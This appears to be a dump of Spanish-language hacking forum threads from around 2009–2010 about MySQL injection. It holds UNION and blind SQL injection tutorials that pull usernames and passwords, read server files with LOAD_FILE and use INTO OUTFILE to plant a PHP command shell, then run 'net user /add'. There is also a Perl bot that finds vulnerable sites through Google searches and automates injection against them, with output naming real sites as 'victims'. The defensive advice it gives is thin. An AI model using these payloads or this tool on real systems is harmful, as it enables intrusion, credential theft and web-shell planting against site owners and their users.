Entonces para probar con name password nos tira

http://127.0.0.1/index.php?id=-1+union+select+concat(0x677561736f6e,0x3a,user),0x677561736f6e,0x677561736f6e,0x677561736f6e+from+mysql.user

http://127.0.0.1/index.php?id=-1+union+select+concat(0x677561736f6e,0x3a,password),0x677561736f6e,0x677561736f6e,0x677561736f6e+from+mysql.user

Nos tira : guason
guason

Entonces las columnas son user y password.

0x06:Como sacar usuarios y password

Ok , si ya conseguiste la tabla de usuarios con las columas interesantes lo que debes hacer es

http://127.0.0.1/index.php?id=-1+union+select+1,2,3,4

Debes elegir algunos de los numeros que salen en la pantalla de resultado.Pues si al final de usar
algunos de los estos numeros y mas adelante no te salio nada , debes intentar con otro numero que
te da la inyeccion en el resultado.

Pues yo eligo el 1. Entonces la inyeccion seria con estos datos

tabla = users
columnas a sacar = name y password

http://127.0.0.1/index.php?id=-1+union+select+concat(name,0x3a,password),2,3,4+from+users

Uso a 0x3a para separar el resultado del name y del password
0x3a = :

La inyeccion nos tira

Guason:123

Ay no! alguien tien mi contraseña xD

Lo mismo seria para mysql.user

http://127.0.0.1/index.php?id=-1+union+select+concat(user,0x3a,password),2,3,4+from+mysql.user

Y lo mismo para information_schema

http://127.0.0.1/index.php?id=-1+union+select+concat(name,0x3a,password),2,3,4+from+users

Pero este ultimo no me anda porque mi mysql es viejo y no tiene information_schema pero la inyeccion nos da el mismo resultado ya que las tablas y columnas si existen

0x07:Sacar informacion de la base de datos

Ok , para sacar informacion de la base de datos seria:

Lo que podemos sacar es

version() = Version de mysql
database() = Tipo base de datos
user()  = usuario
connection_id()  = Id de la conexion

Para tenemos que tenes el numero de columnas

http://127.0.0.1/index.php?id=-1+union+select+1,2,3,4

Pues eligen cualquier numero que les tire el resultado de la inyeccion

En mi caso agarro uno

http://127.0.0.1/index.php?id=-1+union+select+concat(user(),0x3a,database(),0x3a,version(),connection_id(),0x3a),2,3,4

Pues nos tira:

root@localhost:test:4.1.9-max3:

Todos los datos que pedimos primero el user , despues el nombre basedate , luego la version y despues el id de la conexion.

0x08:Como explotar LOAD_FILE

Con la funcion LOAD_FILE podemos leer los archivos que hay en el servidor Ejemplo por defecto
en mi base de datos voy a parar en mysql/data. Yo en este directorio yo tengo un archivo llamado boludo.txt.

Entonces teniendo a boludo.txt = 0x626f6c75646f2e747874
Podemos leer el archivo mediante el numero milagroso y la funcion load_file

http://127.0.0.1/index.php?id=-1+union+select+load_file(0x626f6c75646f2e747874),2,3,4

Entonces el resultado me daria " Hola enfermo! " porque en el archivo boludo.txt tengo solamente eso.

Y asi podran ir sacando cosas malevolas con esta tecnica.

0x09:Como hacer vulnerable a RFI mediante una inyeccion SQL

Pues ya teniendo el numero de columnas tambien podemos crear archivo mediante la funcion
into+outfile
Entonces como siempre agarramos el 1 xD.

Eh intentaremos crear un ejecutor de comandos con este codigo

Language: PHP
 include($_GET[$cmd]); ?>

Cabe aclarar que el directorio que vamos a que guardar este ejecutor no debe ser restringido para
los visitantes.

http://127.0.0.1/index.php.php?id=-1+union+select+' ',2,3,4+into+outfile+'gilo.php'

Ok , si ven que el resultado es nulo y no sale ningun error es que se ah creado el archivo. Por
defecto a mi se me creo en mysql/data.
Solo es cuestion de ir cambiando de directorios hasta que alguno nos deje crear el archivo.

Pero por algo me hago llamar El Gran Guasón , porque no soy mas un newbie y no tengo nada
de noob.

Vamos a ejecutar de nuevo la sentencia pero ahora de esta forma.

http://127.0.0.1/index.php.php?id=-1+union+select+"",2,3,4+into+outfile+'../../www/cmd.php'--

La explicacion seria simple como la estructura de Easy PHP hizo que el resultado del archivo
creado terminara en mysql/data lo que yo hice fue dar dos veces para atras e ir al directorio www de
Easy PHP terminando creando el archivo cmd.php

Ahora solo es cuestion de hacer esto

http://127.0.0.1/cmd.php

Y listo tenemos una cosa rara de shell que ejecuta comandos

Un ejemplo seria

http://127.0.0.1/cmd.php?agarrala=net user /add Jose 123

Este comando es porque mi SO es Windows ,la mayoria de los SO de las webs son linux y los directorios apache varian solo es cuestion de ir probando.

0x10:Evitar estos ataques

Ahora que ya eh explicado casi todo es hora de decir como defenderse de estos ataques
Hay varios formas pero solo nombrare algunas

Language: PHP
$user =(int)$_GET['id'];

Con esto queremos decir que si se introduce algun dato o valor en la inyeccion no sera mostrada

Ahora hay que usar otra para evitar el "select"

$user = $_GET['id'];
$user = str_replace("select","9999999999999",$user);

Ahora este codigo no esta diciendo que si se utiliza la palabra "select" esta sera reemplazada por
"9999999999999".

Con esto creo que bastaria ya que si no consigue el numero de columnas el atacante esta muerto pero si siempre hay cada caso xD.

0x11:Despedida

Con esto doy por finalizado el manual , eh explicado todo lo que conozco , aunque no puso Blind
SQL inyection porque se iba a hacer muy largo pero pronto hare uno con Blind.

Web = guason-cracker.blogspot.com
Agradecimientos = a nadie.

Blind SQL Inyection (1 reply)

Guason — Mon, 01 Mar 2010 20:30:34 -0500

Blind SQL Inyection

Autor:El Gran Guasón

Indice:

0x01:Introduccion
0x02:Como funcionan los ataques Blind SQL Inyection
0x03:Creando un index vulnerable
0x04:Sacando tablas
0x05:Sacar el numero de registro de una tabla
0x06:Sacando columnas de las tablas
0x07:Sacando la longitud de los valores
0x08:Sacar el valor real de una contraseña u otro dato
0x09:Despedida

0x01:Introduccion

Hola a todos o nadie quizas ......... En este manual veremos como explotar paginas webs que sean
vulnerables a Blind SQL Inyection.Tratare de explicar todos los detalles.De como saber si es vulnerable hasta el valor de una contraseña........

0x02:Como funciona los ataques Blind SQL Inyection

Los ataques Blind SQL Inyection a diferencia de los ataques comunes de SQL , este se carateriza por ser un ataque a ciegas. Osea no nos devuelve nada al ejecutar la sentencia sino que la pagina queda igual o da un malefico error. Cuando la pagina se queda igual puede ser un valor positivo pero eso es algo que veremos en este momento.

0x03:Creando un index vulnerable

Para poder practicar les recomiendo Easy PHP , pueden buscarlo en google , descargarlo e instalarlo obviamente xD.Pero creo que lo tengo en algun lado de mi blog.
Ok , a continuacion veran un index vulnerable.

Language: PHP=======================index.php==============================================
 
$host = 'localhost'; 
$dbuser = 'root'; 
$dbname = 'test'; 
$db = mysql_connect($host, $dbuser); 
mysql_select_db($dbname,$db); 
$sql = "SELECT * FROM users WHERE id=".$_GET['id']; 
$query = mysql_query($sql); 
if(@mysql_num_rows($query)==0){ 
die('Cagate! :('); 
} 
$result=@mysql_fetch_row($query); 
echo "Blind SQL Injection
Ejemplos

"; 
echo "user_id: ".$result[0]."
"; 
echo "username: ".$result[1]."
"; 
// echo "password: ".$result[2]."
"; 
echo "
"; 
die();?> 
===========================================================================

====

Y los datos para la consola sql

Language: SQL
CREATE 
TABLE 
`users` (
`id` int(10) UNSIGNED 
NOT 
NULL 
AUTO_INCREMENT,
`name` varchar(25) NOT 
NULL,
`password` varchar(50) NOT 
NULL,
`country` varchar(20) NOT 
NULL,
PRIMARY 
KEY 
(`id`)
 
 
 
 
INSERT 
INTO 
`users` VALUES 
(1, 'Guason', '123', 'Argentina');
INSERT 
INTO 
`users` VALUES 
(2, 'Pero', '11', 'Infierno');
INSERT 
INTO 
`users` VALUES 
(3, 'Trinity', '12354', 'Via Lactea');
INSERT 
INTO 
`users` VALUES 
(4, 'Galaxia', 'gaylord', 'Cabaret');

oK , ahora verifiquen que hayan hecho todo bien de lo contrario se les mostrara como 400 errores .

0x04:Sacando tablas

Ok , ahora vamos a sacar las tablas mediante la siguiente sentencia haciendo de cuenta de que la web atacada es http://127.0.0.1/index.php que vendria a ser su web local con el index del capitulo anterior.

http://127.0.0.1/index.php?id=1+AND (SELECT (COUNT(*)) FROM idiotas)

Pues esta sentencia nos da un valor falso diciendo Cagate. Pero si probamos con un valor positivo.

http://127.0.0.1/index.php?id=1+AND (SELECT (COUNT(*)) FROM users)

La pagina se queda en su lugar o mas bien nos dio un resultado positivo ya que si existe la tabla
users

0x05:Sacar el numero de registro de una tabla

Nice , ahora vamos a sacar el numero de registro de una tabla . En este caso vamos a sacar el numero de registro de la tabla users. Para hacerlo seria de la siguiente manera

http://127.0.0.1/index.php?id=1+AND (SELECT Count(*) FROM users) > 5

Este consulta no dara un resultado negativo ya que la tabla users solo contiene 4 registros y
4 > 5

Entonces iremos probando asi

http://127.0.0.1/index.php?id=1+AND (SELECT Count(*) FROM users) = 1 (Negativo)

http://127.0.0.1/index.php?id=1+AND (SELECT Count(*) FROM users) = 2 (Negativo)

http://127.0.0.1/index.php?id=1+AND (SELECT Count(*) FROM users) = 3 (Negativo)

http://127.0.0.1/index.php?id=1+AND (SELECT Count(*) FROM users) = 4 (Positivo)

Ok , viendo que 4 = 4 , es obvio que la tabla users contiene 4 registros.........

0x06:Sacando columnas de las tablas

Entonces ya es hora de ir sacando las columnas de la tabla users.Para hacerlo deberian hacer esto.

http://127.0.0.1/index.php?id=1+AND(SELECT Count(idiotas) FROM users)

Esta consulta nos daria negativa ya que no existe ninguna columna llamada idiotas en la tabla users

Ahora veamos con las siguientes

http://127.0.0.1/index.php?id=1+AND(SELECT Count(name) FROM users)

Esta consulta nos daria positiva ya que si hay una columna llamada name que vendria a se como el
nombre los usuarios.Y ahora con esta

http://127.0.0.1/index.php?id=1+AND(SELECT Count(password) FROM users)

Ok , nos dio positiva porque si existe una columna llamada password en la tabla users que vendria
ser la contraseña.

0x07:Sacando la longitud de los valores

Bien ahora vamos a aprender a sacar la longitud de los valores de la columna name y password de la
tabla users.

Para sacar la longitud del primer valor de la columna name seria asi

http://127.0.0.1/index.php?id=1+AND(SELECT lenght(name) FROM users where id=1) > 7

Pues no da un resultado negativo ya que 6 no es mayor que siete que vendria a ser "guason"
Entonces para ir descartando seria asi:

http://127.0.0.1/index.php?id=1+AND(SELECT lenght(name) FROM users where id=1) = 1 (Negativo)

http://127.0.0.1/index.php?id=1+AND(SELECT lenght(name) FROM users where id=1) = 2 (Negativo)

http://127.0.0.1/index.php?id=1+AND(SELECT lenght(name) FROM users where id=1) = 3 (Negativo)

http://127.0.0.1/index.php?id=1+AND(SELECT lenght(name) FROM users where id=1) = 4 (Negativo)

http://127.0.0.1/index.php?id=1+AND(SELECT lenght(name) FROM users where id=1) = 5 (Negativo)

http://127.0.0.1/index.php?id=1+AND(SELECT lenght(name) FROM users where id=1) = 6 (Positivo)

Ok , entonces ya podemos deducir que 6 es el numero de caracteres que contiene "guason" que
vendria a ser el primer valor de la columna name de la tabla users.

Para sacar el password seria asi:

http://127.0.0.1/index.php?id=1+AND(SELECT lenght(password) FROM users where id=1) > 4

Pues esta consulta nos daria un resultado negativo porque 3 no es mayor a 4.Porque el primer valor
de la columna password de la tabla users es "123". Entonces para ir descartando seria asi:

http://127.0.0.1/index.php?id=1+AND(SELECT lenght(password) FROM users where id=1) = 1 (Negativo)
http://127.0.0.1/index.php?id=1+AND(SELECT lenght(password) FROM users where id=1) = 2 (Negativo)
http://127.0.0.1/index.php?id=1+AND(SELECT lenght(password) FROM users where id=1) = 3 (Positivo)

Nice , entonces podemos deducir que el primer valor de la columna password de la tabla users
contiene 3 caracteres que en realidad serian "123".

Para ir sacando los otros usuarios solo tendrian que cambiar el 1 por numero del 1 al 4 porque
la tabla users solo contiene 4 registros.Ejemplo para sacar otro usuario seria

http://127.0.0.1/index.php?id=1+AND(SELECT lenght(name) FROM users where id=2) = 1 (Negativo)

Eso seria todo.

0x08:Sacar el valor real de una contraseña u otro dato

Muy bien ahora bien la mejor parte aunque tambien la peor si no tenes una tool automatizadora.
Entonces para sacar la primera letra o numero o lo que sea del primer valor de la columna de la
tabla users , seria asi:

http://127.0.0.1/index.php?id=1 AND ascii(substring((SELECT name FROM users where id=1),1,1)) =
103

Lo que hice fue convertir una letra "g" a ascii dandome esto "103".
Entonces esta consulta nos da un valor positivo porque el primer letra o numero o lo que sea del
primer valor de la columna name de la tabla users es "g" ya que el primer valor de la columna name
de la tabla users es "guason".
Para sacar todo seria asi.

http://127.0.0.1/index.php?id=1 AND ascii(substring((SELECT name FROM users where id=1),2,1))= 117
http://127.0.0.1/index.php?id=1 AND ascii(substring((SELECT name FROM users where id=1),3,1))= 97
http://127.0.0.1/index.php?id=1 AND ascii(substring((SELECT name FROM users where id=1),4,1))= 115
http://127.0.0.1/index.php?id=1 AND ascii(substring((SELECT name FROM users where id=1),5,1))= 111
http://127.0.0.1/index.php?id=1 AND ascii(substring((SELECT name FROM users where id=1),6,1))= 110

Como todo estas consultas me dieron positivas podemos concluir que:

103 = g
117 = u
97 = a
115 = s
111 = o
110 = n

Todo esto si lo juntamos nos da "guason" entonces ya sacamos el el primer valor de la columna
name de la tabla users.

Ahora para la contraseña seria asi

http://127.0.0.1/index.php?id=1 AND ascii(substring((SELECT password FROM users where id=1),1,1)) = 49
http://127.0.0.1/index.php?id=1 AND ascii(substring((SELECT password FROM users where id=1),2,1)) = 50
http://127.0.0.1/index.php?id=1 AND ascii(substring((SELECT password FROM users where id=1),3,1)) = 51

Como todas estas consultas me dieron positivas podemos concluir que :

49 = 1
50 = 2
51 = 3

Entonces si juntamos todos estos datos positivos en su orden , nos daria "123" que vendria a ser
el valor de la columna password de la tabla users , claro como dice su id solo sacamos el primer valor
que vendria a ser el admin.Para sacar otros usuarios seria asi cambiando el 1 del id por un numero
del 1 al 4.Un ejemplo seria asi:

http://127.0.0.1/index.php?id=1 AND ascii(substring((SELECT password FROM users where id=2),1,1)) = 49

Dando un valor positivo ya que el segundo valor de la columna password de la tabla users , su primer
caracter es 1.Porque en realidad el valor real de la columna password de tabla user es "11".

0x09:Despedida

Espero que les haya gustado si no , no me interesa xD. El proceso de sacar los caracteres de las
columnas es un proceso dificil por lo que tendra que hacerse una tool.Yo habia hecho una muy buena
que daba todo tipo de ataques "blind,mysql" pero es una tool de 1500 lineas de codigo por lo que
es totalmente privada para regalar su codigo a cualquiera........

Good Bye

Problema con una Mysql injeccioon (5 replies)

kpext — Fri, 15 Jan 2010 20:57:09 -0500

hola comunidad de UnderSecurity, primero quiero decirles que el foro esta genial
y les deseo lo mejor q sigan adelante :D

bueno les explico mi problema
buscando paginas web vulnerables a sqli encontré una que me a dado problemas a la hora de sacar las tablas con el information_schema
al injectar esto 1+union+select+1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13,14+from+information_schema.tables--

me sale este error
Illegal mix of collations for operation 'UNION' [1271]

alguien sabe a que se deba ese error, o hay otra forma de sacar las tablas??

es version 5.0.51,

saludos

[DUDA] SqlY Unable to jump to row 0 on MySQL result index (4 replies)

m[a]rkus — Thu, 14 Jan 2010 16:03:03 -0500

Hola, pues mi duda es la siguiente a este mensaje de error

Language: PHP
Warning: mysql_result() [function.mysql-result]: Unable to jump to row 0 on MySQL result index

se le puede hacer algun tipo de inyecion ? estube investigando y en ingles mencionaban el uso de "order" y "union" pero eso siempre lo uso pero con los metodos tradicionales no funciona, Gracias por adelantado

Como creo information schema para inyecciones sql (1 reply)

Guason — Mon, 30 Nov 2009 18:44:22 -0500

Les queria preguntar como se crear la columna information schema porque quiero practicar

inyecciones con esa tecnica. Estoy usando Easy PHP y solo tengo activada mysql.user. Tambien

tengo el soft phpmyadmin. ¿Alguien me podria explicar como creo a information schema=?

[Duda] Logeo /admin ¿? (4 replies)

BlDKr — Tue, 24 Nov 2009 19:04:42 -0500

Buenas, hace unas horas conseguí mi primera inyección SQL, la verdad que por curiosidad, estaba buscando unos parches para mi PES y me dió por probar añadirle la comilla simple ', y luego el and 1 = 1, and 1=0, y viendo lo que salía me puse a probar a ver si era capaz de sacar el usuario y contraseña.

Post: http://foro.undersecurity.net/read.php?47,5423 , el tema es que lo conseguí, pero sin embargo, a la hora d eintentar logearme en el directorio /admin con los usuarios que extraje, ninguno es correcto (son 3), alguien podría saber decirme por qué?

Graciass y un saludo!

ayuda web con MySQL (7 replies)

ReNcOoR — Sun, 11 Oct 2009 19:12:45 -0400

hola amigos estoy por aqui liado con esta web
http://www.localhost/es/category.php?id=458%20and%20(select%20substring(concat(1,password),1,1)%20from%20users%20limit%200,1)=1
tiene un blind sql la tabla se llama users y la columna se llama password pero me que do ahy no entiendo muy bien los pocos tutos que tengo sera que alguin me podria dar una luz con esta web para mirar como sacar la otra info muchas gracias y perdonen mi torpeza saludos
bytes

Oz: Evitar poner Paginas... Solo en Full-D

SQLi con filtrado de caracteres (5 replies)

deibix — Sun, 11 Oct 2009 09:55:51 -0400

Buenass

estoy empezando con esto de SQL injection. Me he topado con una web que actúa de la siguiente forma, parametro vulnerable id.

zona=noticias&id=

zona=noticias&id='
Si le meto una comilla me responde con:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

Por lo que entiendo que tiene activado las magic quotes o mysql_real_escape_string y que no filtra los parametros

Si trato de meter un union select, no me da un mensaje de error común sino que me devuelve una respuesta HTTP 406 Not Acceptable
con:
Not Acceptable

An appropriate representation of the requested resource /comun.php could not be found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

Por lo que supongo que tiene el mod_security ( es un server apache )

Lo siguiente que he mirado es intentar sacar el número de campos con order by, aunque no parece tener utilidad

zona=noticias&id=2 order by 13-- <-- ok
zona=noticias&id=2 order by 14-- <-- error

Por lo que supongo que tiene 14 campos. ¿Cómo puedo seguir?

Bot MySql Search Google v 1.0 (1 reply)

MagnoBalt — Tue, 08 Sep 2009 14:15:29 -0400

Bueno estuve haciendo algo parecido a un bot solamente que algo de actividad humana nesesita, pero en el proximo voy automatizarlo por completo.
Este codigo nos sirve para buscar victimas a partir de google luego lo mantiene en un array a los posibles target y luego elegimos a cual de ellas automatizar la inyeccion mediante UNION.
En la version 2.0 voy a guardar todo en un archivo y que luego empieze a inyectar solo y no diga cual tuvo exito y cual no, y en el caso de las que no podriamos probarlo a mano.

Language: Perl
#Bot MySql Search Google v 1.0
#Coded by Magnobalt
#contact Msn: magnobalt@gmail.com 
#thanks www-Insecurity.cl && www.undersecurity.net
 
#!/usr/bin/perl
        use LWP::Simple;
        use LWP::UserAgent;
        use HTTP::Request;
	sub seguir(){
	     print "[?]Desea Seguir con otro enlace Y/N: >>";
	     $seguir=;
	     chomp($seguir);
	     if($seguir =~/[Yy]/){
		goto tamanio;
		}else {
		      print"\n\n";
		      print "+++++++++++++++++++++++++++\n";
		      print "+ Coded by MagnoBalt 2009 +\n";
		      print "+++++++++++++++++++++++++++\n";
		      exit(0);
        	}        
	}
 
	my $sis="$^O";if ($sis eq 'MSWin32') { system("cls"); } else { system("clear"); } #que sistema operativo es
        print "+++++++++++++++++++++++++++++++\n";
        print "+     Bot MySQL Search Google +\n";
        print "+         By MagnoBalt        +\n";
	print "+++++++++++++++++++++++++++++++\n\n";
        print "[?]Ingrese Parametro de Busqueda (ej: inurl:.php?id_noticia=: >> ";
        $dork.=;
	chomp($dork);
	print "[?]Total de paginas de busquedas en Google: >> ";
        $paginas.= ;
	chomp($paginas);
        print "\n[+]Search:\n\n";
        for($i = 0;$i <= $paginas*10;$i += 10)
        {       
        $busqueda = "http://www.google.com/search?hl=en&q=".$dork."&btnG=Search&start=".$i;
            #$busqueda="http://www.google.com/search?hl=es&client=iceweasel-a&rls=org.debian:es-AR:unofficial&q=inurl:.php\%3Fid\%3D+site:com.ar&start=".$i;
	    $ua = LWP::UserAgent->new(agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12');
            $ua->timeout(7);
            #$ua->env_proxy;
            $response = $ua->get($busqueda);
	    $source= $response->content;
            while ($source =~ m/(.*?)<\/a>/g) { #thanks yoyahack
	     # print "regular 1: $1\n";
	     # print "regular 2: $2\n";
	     my $enlace = $1;
	     $testing=$enlace."\'";
	     $ua= LWP::UserAgent->new(agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12');
	     $ua->timeout(10);
	     $response = $ua->get($testing);
	     $error=$response->content;
		if($error=~ /mysql_fetch_/ || $error=~ /You have an error in your SQL syntax/ || $error =~ /tem um erro de sintaxe no seu SQL/ || $error =~ /mysql_num_rows/ || $error =~ /Division by zero in/) {
		push(@victims,$enlace);
 
	  }
    }
}#fin del for
	tamanio:
	$opc="";
	if (@victims){			#verifico si no esta vacio el arrays
	  print "\n[+]Estas son las  posibles victimas:    (Detalle: * Marca de que el link ya se automatizo la inyecion)\n";
	  for($i=0;$i<=$#victims;$i++){
	  print "[$i]$victims[$i]\n";
	      }   
	}else {
	  print "[-]No se encontraron Victimas, realiza otra busqueda o verifica si Google no la bloqueo\n";
	  exit(0);
	 }
	print"\n[?]A cual desea automatizar la inyeccion. Eliga por el indice:>>";
	$opc.=;
	chomp($opc);
	if ($opc > $#victims || $opc < 0){
		print "[!] Error! fuera del rango del indice, Vuelva a intentar\n\n";
		if ($sis eq 'MSWin32') { sleep(3);system("cls"); } else { sleep(3); system("clear"); }
		goto tamanio;
	  }
	$victima=$victims[$opc];
	$victims[$opc]=$victims[$opc]." *";# Coloco al final el Asterisco
	$victima=~s/[a-zA-Z0-9_\*\s]+$//g;;#dejo en blanco el ultimo parametro ($) para poder inyectar, inclusive los valores * y espacion en blanco con \s
	print "[+]Empezando la automatizacion del la inyeccion.\n";
	print "[!]Primer Paso: Intentar sacar numero de columnas para UNION\n";
	print "[?]Maximo numero con cual intentar:>>";
	$column=;
	chomp($column);
	print "[?]elija comentario -- or /* :>>";
	$cfin=;
	chomp($cfin);
	  if ($cfin =~"--"){ 
	      $cmn="+"
	      } else {
	      $cmn="/**/";
	  }
	print "\n[+]Search:";      
	#busqueda de Columnas
	for ($col=0; $col <=$column;$col++){
	     $union.=','."0x6d61676e6f62616c74";
	     $numero.=','.$col;
	      if ($col ==0){
		      $union='';
		      $numero='';
		      }
	     $out=$victima."-1".$cmn."UNION".$cmn."SELECT".$cmn."0x6d61676e6f62616c74".$union.$cfin;
	     $ua= LWP::UserAgent->new(agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12');
	     $ua->timeout(10);
	     $response = $ua->get($out);
	     $verifica=$response->content;
             if ($verifica =~/magnobalt/) {
		 $col++;
		 print "[+]La web posee $col\n";
		 print "[+]".$victima."-1".$cmn."UNION".$cmn."SELECT".$cmn."0".$numero.$cfin."\n\n";
		 #buscando Information_schema
		 print "[!]Segundo Paso: Verficando disponibilidad de Information_Schema\n";
		 $out=$victima."-1".$cmn."UNION".$cmn."SELECT".$cmn."0x6d61676e6f62616c74".$union.$cmn."FROM".$cmn."information_schema.tables".$cfin;#busco information schema.
		 $ua= LWP::UserAgent->new(agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12');
		 $ua->timeout(10);
		 $response = $ua->get($out);
		 $verifica=$response->content;
		 if ($verifica=~/magnobalt/){
		     print "[+]Information Schema Disponible\n";
		     }else {
		     print "[-]Information_Schema no Disponible\n";
		      }
		 #buscando Mysql.users
		 print "[!]Tercer Paso: Verificando disponibilidad de de Mysql.users\n";
		 $out=$victima."-1".$cmn."UNION".$cmn."SELECT".$cmn."0x6d61676e6f62616c74".$union.$cmn."FROM".$cmn."Mysql.users".$cfin;
		 $ua= LWP::UserAgent->new(agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12');
		 $ua->timeout(10);
		 $response = $ua->get($out);
		 $verifica=$response->content;
		 if ($verifica=~/magnobalt/){
		     print "[+]Mysql.users Disponible\n";
		     }else {
		     print "[-]Mysql.users no Disponible\n";
		      }
                 #verficando si esta corriendo como root
		 print "[!]Cuarto Paso: Verificando si el usuario es root\n";
		 while($j < $col-1){
		    $root.=','."concat(0x6d61676e6f62616c74,user())";
		    $j++;
		  }
		 $out=$victima."-1".$cmn."UNION".$cmn."SELECT".$cmn."concat(0x6d61676e6f62616c74,user())".$root.$cfin;
		 $ua= LWP::UserAgent->new(agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12');
		 $ua->timeout(10);
		 $response = $ua->get($out);
		 $verifica=$response->content;
		 if ($verifica=~/magnobaltroot@/){
		     print "[+]El usuario es root\n";
		     }else {
		     print "[-]El usuario no es root\n";
		      }
		 seguir();	      
 
	     } 
	 }
	 print "[-]imposible encontrar numero de columnas\n";
	 seguir();

Ejemplo
a) Aqui hacemos una busqueda y con un total de 3 paginas para google. Luego nos pide a cual automatizar la inyeccion mediante el indice, en este caso coloco 0. para que empieze a automatizar a la url http://www.ibict.br/noticia.php?id=510

Quote
a
+++++++++++++++++++++++++++++++
+ Bot MySQL Search Google +
+ By MagnoBalt +
+++++++++++++++++++++++++++++++

[?]Ingrese Parametro de Busqueda (ej: inurl:.php?id_noticia=: >> noticia.php?id=
[?]Total de paginas de busquedas en Google: >> 3

[+]Search:

[+]Estas son las posibles victimas: (Detalle: * Marca de que el link ya se automatizo la inyecion)
[0]http://www.ibict.br/noticia.php?id=510
[1]http://www.museudelperfum.com/noticia.php?id=19&lang=en
[2]http://madrid.cnt.es/noticia.php?id=118
[3]http://www.museudosesportes.com.br/noticia.php?id=1217
[4]http://www.ibict.br/noticia.php?id=512

[?]A cual desea automatizar la inyeccion. Eliga por el indice:>>0

b) Aqui automatizamos la "0" como dijimos, luego nos pide el numero maximo con cual intentar el numero de columnas para UNION que fue "15", y que tipo de comentario usar que en este caso eleji "--". Nos imprimi la inyeccion con las dos columnas encontradas, y empieza a verificar si esta disponible Information_schema, luego Mysql.users, y por ultimo verifica si el usuario es root.

Quote
b
[?]A cual desea automatizar la inyeccion. Eliga por el indice:>>0
[+]Empezando la automatizacion del la inyeccion.
[!]Primer Paso: Intentar sacar numero de columnas para UNION
[?]Maximo numero con cual intentar:>>15
[?]elija comentario -- or /* :>>--

[+]Search:
[+]La web posee 2
[+]http://www.ibict.br/noticia.php?id=-1+UNION+SELECT+0,1--

[!]Segundo Paso: Verficando disponibilidad de Information_Schema
[+]Information Schema Disponible
[!]Tercer Paso: Verificando disponibilidad de de Mysql.users
[-]Mysql.users no Disponible
[!]Cuarto Paso: Verificando si el usuario es root
[-]El usuario no es root
[?]Desea Seguir con otro enlace Y/N: >>

c) En este caso seguimos inyectando, y fijense como en el enlace de indice "0", nos coloca un * avisandonos que ese ya se intento una vez la automatizacion de la inyeccion. Podriamos seguir intentandolo en el caso de que el comentario "--", no funcione e intentar con "/*". y en el caso tendriamos otro *. (* tantas veces probemos el link)

Quote
c
[?]Desea Seguir con otro enlace Y/N: >>y

[+]Estas son las posibles victimas: (Detalle: * Marca de que el link ya se automatizo la inyecion)
[0]http://www.ibict.br/noticia.php?id=510 *
[1]http://www.museudelperfum.com/noticia.php?id=19&lang=en
[2]http://madrid.cnt.es/noticia.php?id=118
[3]http://www.museudosesportes.com.br/noticia.php?id=1217
[4]http://www.ibict.br/noticia.php?id=512

[?]A cual desea automatizar la inyeccion. Eliga por el indice:>>

Bueno saludos y gracias a todos.
Un abrazo

INTO OUTFILE (Mysql) (no replies)

OzX — Thu, 13 Aug 2009 17:59:15 -0400

o00000000000000000000000000000000000000000000000000000o [!] Paper about:
8                            .o8                      8     INTO OUTFILE (Mysql)
8                           "888                      8 [!] Athor: xados  
8 oooo    ooo  .oooo.    .oooo888   .ooooo.   .oooo.o 8 [!] Contact:
8  `88b..8P'  `P  )88b  d88' `888  d88' `88b d88(  "8 8     xados@hotmail.it
8    Y888'     .oP"888  888   888  888   888 `"Y88b.  8 [!] Thnaks to:
8  .o8"'88b   d8(  888  888   888  888   888 o.  )88b 8     Johannes Dahse      
8 o88'   888o `Y888""8o `Y8bod88P" `Y8bod8P' 8""888P' 8     becouse this  
8                                                     8     paper is from
8                                                     8     his mind.
o00000000000000000000000000000000000000000000000000000o        ~  ~  ~

[+1] The FILE privilege

If we want to read or write to files we have to have the FILE privilege.
First see wich user we are in db with code:

0′ UNION SELECT current_user,null /*

you can put current_user or user() or system_user

This will give us the username@server. //(normally ..@localhost)

*
You can also use the following blind SQL injections query,
but it's very booring.. :

Guess a name:
1′ AND user() LIKE ‘root
Brute the name letter by letter:
1′ AND MID((user()),1,1)>’m
1′ AND MID((user()),2,1)>’m
1′ AND MID((user()),3,1)>’m ecc...

Now we must acces to mysql.user so..

0′ UNION SELECT 1,2,3,file_priv,4 FROM mysql.user WHERE user = ‘username

for username we put the name of current_user.
You can also have a look at the whole mysql.user table without the WHERE clause, but I chose this way because you can easily adapt the injection for blind SQL injection:

1′ AND MID((SELECT file_priv FROM mysql.user WHERE user = ‘username’),1,1) = ‘Y

Naturally, this it's a blind so yuo can't write 1,2,3.. becouse it's not a union select. (but it's subselects )

You can also recieve the FILE privilege info from the information.schema table on MySQL 5:

0′ UNION SELECT grantee,is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘file’ AND grantee like ‘%username%

Like IN blind sqli:

1′ AND MID((SELECT is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘file’ AND grantee like ‘%username%’),1,1)=’Y


[+2] The web directory problem

Once we know if we can read/write files we have to check out the right path. In the most cases the MySQL server is running on the same machine as the webserver does and to access our files later we want to write them onto the web directory. If you define no path, INTO OUTFILE will write into the database directory.

On MySQL 4 we can get an error message displaying the datadir:
0′ UNION SELECT load_file(’a'),null/*

On MySQL 5 we use:
0′ UNION SELECT @@datadir,null/*

The default path for file writing then is datadir\databasename.
You can figure out the databasename with:
0′ UNION SELECT database(),null/*

Now these information are hard to get with blind SQL injection. But you don’t need them necessarily. Just make sure you find out the web directory and use some ../ to jump back from the datadir.

If you are lucky the script uses mysql_result(), mysql_free_result(), mysql_fetch_row() or similar functions and displays warning messages. Then you can easily find out the webserver directory by leaving those functions with no input that they will throw a warning message like:

